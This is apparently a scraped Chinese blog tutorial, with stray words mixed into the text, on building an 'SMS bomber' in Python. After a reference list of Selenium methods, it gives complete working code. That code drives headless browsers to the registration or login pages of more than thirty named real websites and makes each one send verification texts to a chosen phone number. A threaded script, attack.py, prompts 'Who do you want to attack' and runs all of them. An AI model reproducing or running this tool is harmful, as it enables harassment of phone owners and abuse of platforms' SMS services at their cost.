之前的网站几乎不会对短信验证码接口作太多的安全防御,致使调用短信接口十分容易 - 构造一个post
或者get
的请求就能够了!恶意调用网站的短信验证码会让平台负担更多的费用!因此各大网站便采用各类方法来防止恶意调用短信接口,诸如:php
虽然上述的保护措施都有相应的办法解决,但代价是很大的!对于短信轰炸机来讲,避开这些被保护的网站才是最好的办法!咱们须要找到是那些只作了后台记录,没有其它措施的网站。当咱们找到大量这样的网站,咱们就能达到轰炸的效果!但若是网站故意把发包的数据弄得很复杂,没学过web岂不是就凉凉了。先不要慌,咱们请出今天的主角- Selenium,这个python库能够模拟执行浏览器操做,这样咱们就不用发包,直接模拟填写表单点击发送就能够了!最后,写短信轰炸机就纯属体力活了css
Selenium的库安装很简单,python直接使用pip install
便可!使用这个库以前须要下载相应的浏览器驱动,并将下载的驱动放到python的安装目录下。
举个栗子:我用的是最新的火狐浏览器,先进官网下载对应的驱动,我下载的是geckodriver-v0.22
,个人python目录在C:\python27-x64\
,将刚刚下载的驱动放到这个目录下便可!html
Selenium的常见用法python
定位元素:
find_element_by_id 经过元素id定位
find_element_by_name 经过元素name定位
find_element_by_xpath 经过xpath表达式定位
find_element_by_link_text 经过完整超连接定位
find_element_by_partial_link_text 经过部分连接定位
find_element_by_tag_name 经过标签订位
find_element_by_class_name 经过类名进行定位
find_element_by_css_selector 经过css选择器进行定位经常使用函数:
set_window_size() 设置浏览器的大小
back() 控制浏览器后退
forward() 控制浏览器前进
refresh() 刷新当前页面
clear() 清除文本
send_keys(value) 模拟按键输入
click() 单击元素
submit() 用于提交表单
get_attribute(name) 获取元素属性值
is_displayed() 设置该元素是否用户可见
size 返回元素的尺寸
text 获取元素的文本
WebDriverWait() 显示等待,知足条件才执行
driver.implicitly_wait(8) 隐式等待,设置超时时间,无影响react鼠标操做:
ActionChains(driver) 构造ActionChains对象
context_click() 执行鼠标悬停操做
move_to_element(above) 右击
double_click() 双击
drag_and_drop() 拖动
move_to_element(above) 执行鼠标悬停操做
context_click() 用于模拟鼠标右键操做, 在调用时须要指定元素定位
perform() 执行全部 ActionChains 中存储的行为,能够理解成是对整个操做的提交动做git键盘操做:
send_keys(Keys.BACK_SPACE) 删除键(BackSpace)
send_keys(Keys.SPACE) 空格键(Space)
send_keys(Keys.TAB) 制表键(Tab)
send_keys(Keys.ESCAPE) 回退键(Esc)
send_keys(Keys.ENTER) 回车键(Enter)
send_keys(Keys.CONTROL,‘a’) 全选(Ctrl+A)
send_keys(Keys.CONTROL,‘c’) 复制(Ctrl+C)web断言:
title 用于得到当前页面的标题
current_url 用户得到当前页面的URL
text 获取搜索条目的文本信息segmentfault窗口切换:
current_window_handle 得到当前窗口句柄
window_handles 返回全部窗口的句柄到当前会话
switch_to.window() 用于切换到相应的窗口浏览器下拉框:
select_by_value(“选择值”) 至关于咱们使用鼠标选择下拉框的值安全Cookie:
get_cookies() 得到全部cookie信息
get_cookie(name) 返回字典的key为“name”的cookie信息
add_cookie(cookie_dict) 添加cookie。“cookie_dict”指字典对象
delete_cookie(name,optionsString) 删除cookie信息
delete_all_cookies() 删除全部cookie信息调用JS:
js="window.scrollTo(100,450);"
driver.execute_script(js)关闭窗口:
close() 关闭单个窗口
quit() 关闭全部窗口
短信验证码接口(smsbomber.py):
# encoding=utf8 import time from selenium import webdriver class Bomber(object): def __init__(self, phone): self.phone = phone self.options = webdriver.FirefoxOptions() self.options.add_argument('--headless') # 后台模式 # 百度 def func0(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://www.baidu.com/') browser.find_element_by_xpath('//*[@id="u1"]/a[7]').click() browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__footerULoginBtn"]').click() browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsSwitchWrapper"]').click() browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsPhone"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="TANGRAM__PSP_10__smsTimer"]').click() browser.quit() # 1号店 def func1(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://passport.yhd.com/passport/register_input.do') browser.find_element_by_xpath('//*[@id="userName"]').send_keys('helloworld998') browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone) time.sleep(1) browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click() browser.find_element_by_xpath('//*[@id="validPhoneCodeDiv"]/a').click() browser.quit() # 中国移动 def func2(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://login.10086.cn/login.html') browser.find_element_by_xpath('//*[@id="sms_login_1"]').click() browser.find_element_by_xpath('//*[@id="sms_name"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="getSMSPwd1"]').click() browser.quit() # 51book def func3(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://caigou.51book.com/caigou/manage/designatedRegistryNewSignon.in') browser.find_element_by_xpath('//*[@id="cg_06"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="sendMSgBtu"]').click() browser.quit() # 世界邦 def func4(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://www.shijiebang.com/reg/') browser.find_element_by_xpath('/html/body/div[1]/div/div[3]/div/ul[1]/li[1]/a').click() browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/div/label[2]/input').click() browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[1]/td/div/input').send_keys(self.phone) browser.find_element_by_xpath('/html/body/div[8]/div[2]/div/div[2]/table[2]/tbody/tr[2]/td/div/button').click() browser.quit() # 优酷 def func5(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://account.youku.com/register.htm') browser.find_element_by_xpath('//*[@id="passport"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="password"]').send_keys('helloworld998') browser.find_element_by_xpath('//*[@id="repeatPsd"]').send_keys('helloworld998') browser.find_element_by_xpath('//*[@id="getMobileCode"]').click() browser.quit() # 亚马逊 def func6(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://www.amazon.cn/ap/register?_encoding=UTF8&openid.assoc_handle=cnflex&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.mode=checkid_setup&openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.ns.pape=http%3A%2F%2Fspecs.openid.net%2Fextensions%2Fpape%2F1.0&openid.pape.max_auth_age=0&openid.return_to=https%3A%2F%2Fwww.amazon.cn%2Fgp%2Fyourstore%2Fhome%3Fie%3DUTF8%26ref_%3Dnav_custrec_newcust') # browser.find_element_by_xpath('//*[@id="nav-flyout-ya-newCust"]/a').click() browser.find_element_by_xpath('//*[@id="ap_customer_name"]').send_keys('Mike998') browser.find_element_by_xpath('//*[@id="ap_phone_number"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="ap_password"]').send_keys('pwd123456') browser.find_element_by_xpath('//*[@id="ap_register_form"]/div/div/div[5]/div/label/input').click() browser.find_element_by_xpath('//*[@id="continue"]').click() browser.quit() # 私否 def func7(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://segmentfault.com/') browser.find_element_by_xpath('/html/body/div[2]/nav/div[2]/div[2]/ul/li/a[1]').click() browser.find_element_by_xpath('/html/body/div[5]/div/div/div[2]/div/div/div/form/div[4]/a').click() browser.find_element_by_xpath('/html/body/div[5]/div/div/div[2]/div/div/div/form/div[1]/input').send_keys(self.phone) browser.find_element_by_xpath('/html/body/div[5]/div/div/div[2]/div/div/div/form/div[2]/div[1]/span/button').click() browser.quit() # 中瑞财富 def func8(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://www.zrcaifu.com/register') browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="register-ul"]/li[1]/input').click() browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').send_keys('pwd123456') browser.find_element_by_xpath('//*[@id="register-ul"]/li[2]/input').click() browser.find_element_by_xpath('//*[@id="register-ul"]/li[3]/input').send_keys('pwd123456') time.sleep(1) browser.find_element_by_xpath('//*[@id="sendsms-for-regiter"]').click() browser.quit() # 97格格 def func9(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://www.97gg.net/Account/Register') browser.find_element_by_xpath('//*[@id="phoneRegistTab"]/tab').click() browser.find_element_by_xpath('//*[@id="UserName"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="Password"]').send_keys('pwd123456') browser.find_element_by_xpath('//*[@id="ConfirmPassword"]').send_keys('pwd123456') browser.find_element_by_xpath('//*[@id="chkCodeSendBtn"]').click() browser.quit() # 公里 def func10(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://www.1000.com/reg?us=3W-head') browser.find_element_by_xpath('//*[@id="react-content"]/div/div/div/div[2]/form/div[2]/div[2]/div/div/input').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="send_code"]').click() browser.quit() # 惟品会 def func11(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://passport.vip.com/register') browser.find_element_by_xpath('//*[@id="J_mobile_name"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="J_mobile_verifycode_btn"]').click() browser.quit() # 嗨厨房 def func12(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://m.haichufang.com/reg.html') browser.find_element_by_xpath('//*[@id="login"]/div[2]/input').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="login"]/div[2]/div[2]/div[1]').click() browser.quit() # 好美家 def func13(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://www.jaja123.com/web/register') browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[2]/div[1]/input').send_keys(u'张飞') browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[3]/div[1]/input').send_keys(self.phone) browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[4]/div[1]/input').send_keys('pwd123456') browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[5]/div[1]/input').send_keys('pwd123456') browser.find_element_by_xpath('/html/body/div/div[4]/form/div/div[1]/div[6]/div[1]/div/span/button').click() browser.quit() # 小米 def func14(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://cn.account.xiaomi.com/pass/register?_locale=zh_CN') browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[3]/div[2]/label/input').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="main_container"]/div[3]/div[1]/div/div[6]/input').click() browser.quit() # 巨人网络 def func15(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://reg.ztgame.com/') browser.find_element_by_xpath('//*[@id="reg_form"]/div[1]/input').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="reg_form"]/div[2]/input[2]').click() browser.quit() # 微盟 def func16(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://account.weimob.com/register') browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="signUpForm"]/div[3]/a').click() browser.quit() # 商品宅配 def func17(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://www.homekoo.com/zhixiao/cuxiao/index.php') browser.find_element_by_xpath('//*[@id="username5"]').send_keys(u'张飞') browser.find_element_by_xpath('//*[@id="tel5"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="submit_img5"]').click() browser.quit() # 快乐购 def func18(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://www.happigo.com/register/') browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="send_auth_code"]').click() browser.quit() # 手机中国 def func19(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://passport.cnmo.com/register/') browser.find_element_by_xpath('//*[@id="m_mobile"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="m_uname"]').send_keys('helloworld998') browser.find_element_by_xpath('//*[@id="m_password"]').send_keys('pwd123456') browser.find_element_by_xpath('//*[@id="m_confirm"]').send_keys('pwd123456') browser.find_element_by_xpath('//*[@id="m_getcode"]').click() browser.quit() # 苏宁 def func20(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://reg.suning.com/person.do') browser.find_element_by_xpath('//*[@id="mobileAlias"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="sendSmsCode"]').click() browser.quit() # 爱奇艺 def func21(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://www.iqiyi.com/iframe/loginreg?is_reg=1&') browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[2]/i').click() browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/div[1]/div[2]/input').send_keys(self.phone) browser.find_element_by_xpath('/html/body/div[2]/div[2]/div[1]/div[1]/div[1]/div/a[2]').click() browser.quit() def func22(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://www.facebank.cn/user.html') # browser.switch_to.alert() browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone) time.sleep(1) browser.find_element_by_xpath('//*[@id="getSmsCode"]').click() time.sleep(1) browser.quit() # 支付宝 def func23(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://memberprod.alipay.com/account/reg/index.htm') # 焦点问题未解决,支付宝接口无效 browser.quit() # 粉笔网 def func24(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://fenbi.com/web/signup') # 弹窗问题,接口无效 browser.quit() def func25(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://jrh.financeun.com/Login/jrwLogin?web=jrw') browser.find_element_by_xpath('//*[@id="login-segment-phoneLogin"]').click() browser.find_element_by_xpath('//*[@id="quickMobile"]').send_keys(self.phone) time.sleep(1) browser.find_element_by_xpath('//*[@id="quickSendMsgCode"]').click() browser.quit() def func26(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://www.maifupay.com/register') browser.find_element_by_xpath('/html/body/div[2]/div/div[1]/form/div[1]/input').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="sendVerifySmsButton"]').click() browser.quit() def func27(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://passport.ingping.com/reg/index?retUrl=https%3A%2F%2Fwww.ingping.com&fxPid=') browser.find_element_by_xpath('//*[@id="phoneNum"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="sendRegMsgA"]').click() browser.quit() def func28(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://www.decathlon.com.cn/zh/create') browser.find_element_by_xpath('//*[@id="mobile"]').send_keys(self.phone) time.sleep(1) browser.find_element_by_xpath('//*[@id="login-button"]').click() time.sleep(1) browser.quit() # 迅雷 def func29(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://vip.xunlei.com/?referfrom=v_pc_qtcp_ggong_xlhy') # 相似支付宝页面没法解决焦点问题,猜想用JS解决 browser.quit() def func30(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://my.ruanmei.com/?page=register') browser.find_element_by_xpath('//*[@id="phone"]').send_keys(self.phone) time.sleep(1) browser.find_element_by_xpath('//*[@id="sendsms"]').click() browser.quit() def func31(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('https://www.juhe.cn/register') browser.find_element_by_xpath('//*[@id="username"]').send_keys('helloworld998') browser.find_element_by_xpath('//*[@id="password"]').send_keys('pwd123456') browser.find_element_by_xpath('//*[@id="mobilephone"]').send_keys(self.phone) browser.find_element_by_xpath('//*[@id="reg_smsbtn"]').click() time.sleep(1) browser.quit() def func32(self): browser = webdriver.Firefox(firefox_options=self.options) browser.implicitly_wait(8) browser.get('http://passport.zongheng.com/webreg?location=http%3A%2F%2Fwww.zongheng.com%2F') browser.find_element_by_xpath('//*[@id="regphone"]').send_keys(self.phone) time.sleep(1) browser.find_element_by_xpath('/html/body/div[3]/div[2]/p[3]/span').click() browser.quit()
调用上面的接口实施攻击(attack.py):
# encoding=utf8 # attack.py from smsbomber import Bomber import threading def attack1(phone): func = ['func%d' %i for i in range(0,15)] for i in func: if hasattr(Bomber,i): try: getattr(Bomber(phone),i)() print '%s has excuted!' %i except: print '%s meet some problems!' %i continue else: print 'There is not %s' %i def attack2(phone): func = ['func%d' %i for i in range(15,30)] for i in func: if hasattr(Bomber,i): try: getattr(Bomber(phone),i)() print '%s has excuted!' %i except: print '%s meet some problems!' %i continue else: print 'There is not %s' %i def attack3(phone): func = ['func%d' %i for i in range(30,45)] for i in func: if hasattr(Bomber,i): try: getattr(Bomber(phone),i)() print '%s has excuted!' %i except: print '%s meet some problems!' %i continue else: print 'There is not %s' %i phone = raw_input('Who do you want to attack:').strip() # phone = '01234567890' thread1 = threading.Thread(target=attack1,name='thread1',args=(phone,)) thread2 = threading.Thread(target=attack2,name='thread2',args=(phone,)) thread3 = threading.Thread(target=attack3,name='thread3',args=(phone,)) # threading.current_thread().name thread1.start() thread2.start() thread3.start() thread1.join() thread2.join() thread3.join() print 'Good Bye!'
已经实现:
暂未实现而且有可能实现:
运行结果